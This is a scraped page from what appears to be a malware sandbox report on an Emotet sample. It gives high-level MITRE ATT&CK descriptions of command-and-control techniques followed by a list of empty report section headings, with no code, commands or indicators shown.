Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report wNjqkrm8pH

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets